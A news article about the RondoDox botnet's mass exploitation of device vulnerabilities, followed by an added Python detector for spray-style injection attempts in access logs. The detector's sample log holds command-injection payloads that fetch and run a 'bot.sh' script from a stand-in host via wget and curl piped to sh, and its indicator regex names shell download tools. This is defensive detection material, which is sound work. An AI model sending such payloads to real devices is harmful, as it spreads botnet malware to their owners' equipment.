A new RondoDox botnet campaign uses an “exploit shotgun” – fire at everything, see what hits – to target 56 vulnerabilities across at least 30 different vendors’ routers, DVRs, CCTV systems, web servers, and other network devices, and then infect the buggy gear with malware.
RondoDox is a new-ish botnet that first surfaced in mid-2025 and weaponizes command-injection flaws in internet-facing devices. In recent months, it’s been spotted delivering multi-architecture payloads that infect vulnerable gear with a Mirai variant, which allows attackers to remotely control infected equipment and perform large-scale network attacks, including DDoS campaigns.
The campaign targets a huge range of infrastructure, including Cisco, D-Link, Linksys, and Netgear routers, along with Apache HTTP servers, Brickcom IP cameras, and AVTECH CCTV systems, among many others, according to Trend Micro’s Zero Day Initiative researchers, who spotted the botnet exploiting a bug first disclosed at a previous ZDI Pwn2Own contest.
This kind of exposure opens organizations up to data theft, long-term network compromise, and operational disruption, so unless you want RondoDox living rent-free on your network devices, it's worth checking ZDI's very long list of affected vendors and products, the CVEs seen in the campaign (where one has been assigned), and how each vulnerability is being weaponized.
While we’re not going to list all 50-plus bugs or the dozens of products, they include CVE-2024-3721, a critical vulnerability affecting TBK DVR devices that allows remote attackers to execute arbitrary commands, and CVE-2024-12856, an OS command injection vulnerability in Four-Faith industrial routers that allows remote attackers to execute arbitrary commands.
FortiGuard Labs previously linked both of these vulnerabilities to RondoDox.
While the bug hunters don’t know how many devices have been infected, “any consumer product with internet access was likely targeted in this attack,” ZDI senior threat researcher Peter Girnus told The Register. “The loader script tied to the exploits contained multi-architecture payloads designed to infect a variety of Linux systems with a Mirai variant.”
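The behaviour described above, a single source spraying command-injection payloads at many different device endpoints within a few minutes, leaves a distinctive shape in a web or device access log even when you do not yet have a signature for each of the 56 bugs. The following Python is an added example, not code from The Register, ZDI, or the botnet itself: it parses Common Log Format lines, flags requests whose decoded path carries shell-injection indicators, and reports any source that hits several distinct endpoints with such payloads inside a short window. The log lines, endpoint names, indicator list, window and threshold are all constructed assumptions for the example, not observed campaign data.

```python
"""
Heuristic "exploit shotgun" detector for device/web access logs.

One source firing command-injection payloads at many distinct endpoints in
a short window is the pattern to catch; the exact CVE does not matter.
Added example; log format, indicators and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Common Log Format: ip ident user [time] "METHOD path HTTP/x" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Shell-injection indicators in a URL-decoded path (assumed list; a bare
# '|' or ';' will also catch some legitimate traffic, so tune for your site).
INJECTION_RE = re.compile(r"[;|`]|\$\(|&&|\b(?:wget|curl|busybox|chmod|nc)\b|/tmp/")

# Constructed sample log, not real campaign traffic. 203.0.113.7 sprays four
# endpoints in five seconds; 192.0.2.1 makes one attempt; 198.51.100.50 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Sep/2025:04:12:01 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget%20http://198.51.100.9/bot.sh HTTP/1.1" 404 0
203.0.113.7 - - [23/Sep/2025:04:12:02 +0000] "POST /goform/setSystemTime HTTP/1.1" 200 0
203.0.113.7 - - [23/Sep/2025:04:12:03 +0000] "GET /HNAP1/?cmd=$(curl%20198.51.100.9/bot.sh|sh) HTTP/1.1" 404 0
203.0.113.7 - - [23/Sep/2025:04:12:04 +0000] "GET /dvr/query?cmd=cd%20/tmp;busybox%20wget HTTP/1.1" 404 0
203.0.113.7 - - [23/Sep/2025:04:12:05 +0000] "GET /goform/formPing?target=`id` HTTP/1.1" 404 0
198.51.100.50 - - [23/Sep/2025:04:12:06 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.1 - - [23/Sep/2025:04:30:00 +0000] "GET /cgi-bin/ping.cgi?host=1.1.1.1;id HTTP/1.1" 404 0
"""


def parse_line(line):
    """Parse one CLF line; return a record dict or None if it does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    path = unquote(m["path"])  # decode %20 etc. before looking for metacharacters
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "endpoint": path.split("?", 1)[0],  # group by path without query string
        "path": path,
        "injection": bool(INJECTION_RE.search(path)),
    }


def find_shotgun_sources(lines, window=timedelta(minutes=5), min_endpoints=3):
    """Return one alert per source IP that sent injection-looking requests to
    at least `min_endpoints` distinct endpoints within any `window`."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["injection"]:
            by_ip[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best = None
        j = 0
        # Two-pointer sliding window over the time-sorted attempts.
        for i in range(len(recs)):
            while j < len(recs) and recs[j]["ts"] - recs[i]["ts"] <= window:
                j += 1
            endpoints = {r["endpoint"] for r in recs[i:j]}
            if len(endpoints) >= min_endpoints and (
                best is None or len(endpoints) > len(best["endpoints"])
            ):
                best = {
                    "ip": ip,
                    "endpoints": sorted(endpoints),
                    "attempts": j - i,
                    "first": recs[i]["ts"],
                    "last": recs[j - 1]["ts"],
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_shotgun_sources(SAMPLE_LOG.splitlines()):
        print(f"{alert['ip']}: {alert['attempts']} injection attempts against "
              f"{len(alert['endpoints'])} endpoints between {alert['first']} and "
              f"{alert['last']}: {', '.join(alert['endpoints'])}")
```

On the sample, only 203.0.113.7 is reported: the single attempt from 192.0.2.1 stays below the threshold, and the benign request from 198.51.100.50 carries no indicators. A POST whose injection sits in the body is invisible here because CLF does not log bodies; if your devices can log request bodies or you have a WAF in front of them, feed that field through the same indicator check.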
The exploit shotgun began on September 22, peaked on September 23, and continued through September 24, Girnus said, adding that the bug hunters haven’t seen any new events since then. “It may have been a smash-and-grab campaign,” he noted.
Although ZDI doesn’t have enough data to attribute the assault to a particular crime group, or to know what the attackers are doing once they’ve occupied vulnerable devices, the security researchers “are actively tracking this botnet,” Girnus said.
It’s especially concerning because RondoDox recently broadened its distribution by using a loader-as-a-service infrastructure that co-packages RondoDox with Mirai and Morte (a Mirai variant) payloads.
Shortly after ZDI spotted the peak, CloudSEK warned about a “sophisticated” botnet operation using a loader-as-a-service model and distributing RondoDox, Mirai, and Morte payloads through routers, IoT devices, and enterprise applications. These attacks spiked 230 percent between July and August, the threat intel firm said. ®